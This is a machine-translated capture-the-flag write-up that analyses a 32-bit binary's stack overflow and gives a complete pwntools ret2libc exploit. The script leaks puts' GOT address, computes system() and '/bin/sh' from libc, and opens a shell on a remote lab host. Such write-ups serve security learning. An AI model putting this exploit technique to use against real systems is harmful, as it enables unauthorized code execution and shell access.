One 、 see file

32 position

Two 、IDA Decompile

Let's look at the code ：

fd It's a file handle , Open a file with a given random value , Truncated into four bytes int Assign to

buf Pass in sub_804871F()：

therefore buf It's also a random number .

Let's look at it in order sub_804871F(buf),

sprintf() The parameter a1 Convert to string s, The next line reads the string buf,v5 Is its length

Next two rows buf The last character is removed ,v1 For its new length

Next if nesting strncmp

The real overflow point is sub_80487D0() Inside ：

Consider controlling parameters a1 Is a larger number （0xff）, Trigger read() The stack overflowed

This requires us to be in sub_804871F() Also through read() Make an overflow
Give Way buf And the length of it reaches 8 Can cover up return The variable of

Then there is the routine ret2libc,

stay sub_80487D0() Return the address to by hijacking write() Leak a function （ I use it read ） Of got Table address

Finally, add the offset to get system() and ‘/bin/sh’ The real address of

Repeated calls to sub_80487D0(), Stack overflow , Make the program call system(‘/bin/sh’), success getshell

Code

from pwn import *

#attack
r = remote("node4.buuoj.cn",27516)
elf = ELF("./pwn")
libc = ELF("./libc-2.23.so")# Download from the link below the title 

#params
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr = 0x8048825

#attack1
payload = b'\x00' + b'M'*6 + b'\xff'
r.sendline(payload)

#attack2
payload_1 = b'M'*(0xE7+4) + p32(puts_plt) + p32(main_addr) + p32(puts_got)
r.sendline(payload_1)
r.recvline()
puts_addr = u32(r.recv(4))
print("puts_addr: " + hex(puts_addr))

#attack3
r.sendline(payload)

#libc
base_addr = puts_addr - libc.symbols['puts']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))
print("system_addr: " + hex(system_addr))
print("bin_sh_addr: " + hex(bin_sh_addr))

#attack4
payload_2 = b'M'*(0xE7+4) + p32(system_addr) + b'M'*4 +p32(bin_sh_addr)
r.sendline(payload_2)

r.interactive()